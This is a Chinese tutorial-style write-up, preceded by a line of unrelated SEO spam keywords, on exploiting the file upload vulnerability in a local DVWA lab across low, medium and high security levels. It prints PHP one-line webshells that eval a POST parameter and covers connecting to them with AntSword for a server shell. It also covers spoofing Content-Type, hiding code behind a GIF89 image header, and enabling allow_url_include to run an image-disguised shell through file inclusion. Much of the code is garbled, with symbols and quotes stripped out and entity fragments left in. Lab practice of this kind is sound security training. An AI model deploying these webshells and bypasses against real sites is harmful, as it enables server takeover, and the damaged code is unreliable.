深圳网站建设是什么,磁县网络推广,做的比较好的游戏网站,无需登录网页小游戏网站文件上传漏洞广泛存在于Web1.0时代#xff0c;恶意攻击者的主要攻击手法是将可执行脚本#xff08;WebShell#xff09;上传至目标服务器#xff0c;以达到控制目标服务器的目的。
此漏洞成立的前提条件至少有下面两个#xff1a;
1.可以上传对应的脚本文件#xff0c;…文件上传漏洞广泛存在于Web1.0时代恶意攻击者的主要攻击手法是将可执行脚本WebShell上传至目标服务器以达到控制目标服务器的目的。
此漏洞成立的前提条件至少有下面两个
1.可以上传对应的脚本文件并且被服务器解析比如php上传为.phpJava则上传jar包等
2.上传文件之后攻击者知道文件的地址也就是说可以从浏览器地址栏访问到文件。
我使用本地的dvwa靶场进行实战。 1. 防护级别为低low
书写脚本文件1.php
?php phpinfo();
?
进入文件上传模块 点击上传上传成功并且可以看到上传的地址这里满足了条件1 在浏览器中拼接相关地址http://localhost:5555/vulnerabilities/upload/#/../../hackable/uploads/1.phphttp://localhost:5555/hackable/uploads/1.phphttp://localhost:5555/vulnerabilities/upload/#/../../hackable/uploads/1.php 发现成功输出了文件信息这里满足了条件2。
如果在平时的渗透测试中到这一步已经证明了漏洞存在。但是我为了增强实战能力编写了对应的可执行脚本如下这段代码很简单从post请求中获取cmd参数并且执行。这被称为一句话木马相信大家知道了通过向http://localhost:5555/hackable/uploads/1.php发出post请求即可执行任意命令也就是说等于拿到了服务器权限。
记得重新上传这个可执行脚本
?php eval($POST[cmd]);
?
一键使用此木马的工具以前有中国菜刀现在有中国蚁剑antsword。我使用最新的antsword。
但是如下图发现返回数据为空猜测是php版本为7导致的所以我需要修改一下一句话木马。 我修改为如下的代码希望可以运行成功但是居然报了这么多的错误
?php $pst $POST[cmd];eval(pst);
? 继续排查原因原来是第一行的分号写错了。
可执行的代码如下
?php $pst $_POST[hacker];eval($pst);
?
右下角提示连接成功 点击添加即可使用右键可以查看支持的功能。 打开虚拟终端已经拿下了服务器权限 2.防护等级为中medium
点击查看源代码发现其通过type来判断于是可以使用burp修改发送的数据包来实现改变。 修改content type为imag/png 上传成功 3.防护等级为高High
查看源代码发现其使用后缀名判断 看到其对后缀名做了限制jpg、jpeg、png并且使用getimagesize函数确定文件头为图片。
所以我们在文件头加上图片头标识
GIF89
?php $p $_POST[cmd];eval($p);
?
重命名为2.jpg上传成功 但是这是jpg文件无法被服务器执行所以我们使用前面的文件包含漏洞来执行
但是我的文件包含没打开即allow_url_include Off。
使用以下命令打开我的行数为824如果不知道你的就cat来确定。
docker exec -it [容器id] /bin/bash # 进入容器
cd /etc/php/7.0
sed -i 824s/.*/allow_url_include On/ php.ini
docker restart [容器id] # 重启容器
然后再次尝试上传文件成功在地址栏打开注意我修改了端口号。http://127.0.0.1/vulnerabilities/fi/?pagefile:///var/www/html/hackable/uploads/2.jpg 但是使用蚁剑无法连接不知道为什么于是我又去做了一个图片马。
还是连接失败虽然文件上传成功了。
搞了很久才成功
使用记事本打开jpg在后面加上代码 到这里低中高危难度都通过了。
我们来看看不可能出现漏洞的代码可以看到其不仅判断了文件类型还将文件名使用md5的方式进行了加密就算上传可执行文件成功攻击者也无法知道具体的文件名。还对文件内容做了限制并且加上了CSRF验证。
?phpif( isset( $_POST[ Upload ] ) ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ user_token ], $_SESSION[ session_token ], index.php );// File information$uploaded_name $_FILES[ uploaded ][ name ];$uploaded_ext substr( $uploaded_name, strrpos( $uploaded_name, . ) 1);$uploaded_size $_FILES[ uploaded ][ size ];$uploaded_type $_FILES[ uploaded ][ type ];$uploaded_tmp $_FILES[ uploaded ][ tmp_name ];// Where are we going to be writing to?$target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads/;//$target_file basename( $uploaded_name, . . $uploaded_ext ) . -;$target_file md5( uniqid() . $uploaded_name ) . . . $uploaded_ext;$temp_file ( ( ini_get( upload_tmp_dir ) ) ? ( sys_get_temp_dir() ) : ( ini_get( upload_tmp_dir ) ) );$temp_file . DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . . . $uploaded_ext;// Is it an image?if( ( strtolower( $uploaded_ext ) jpg || strtolower( $uploaded_ext ) jpeg || strtolower( $uploaded_ext ) png ) ( $uploaded_size 100000 ) ( $uploaded_type image/jpeg || $uploaded_type image/png ) getimagesize( $uploaded_tmp ) ) {// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)if( $uploaded_type image/jpeg ) {$img imagecreatefromjpeg( $uploaded_tmp );imagejpeg( $img, $temp_file, 100);}else {$img imagecreatefrompng( $uploaded_tmp );imagepng( $img, $temp_file, 9);}imagedestroy( $img );// Can we move the file to the web root from the temp folder?if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {// Yes!echo prea href${target_path}${target_file}${target_file}/a succesfully uploaded!/pre;}else {// Noecho preYour image was not uploaded./pre;}// Delete any temp filesif( file_exists( $temp_file ) )unlink( $temp_file );}else {// Invalid fileecho preYour image was not uploaded. We can only accept JPEG or PNG images./pre;}
}// Generate Anti-CSRF token
generateSessionToken();?
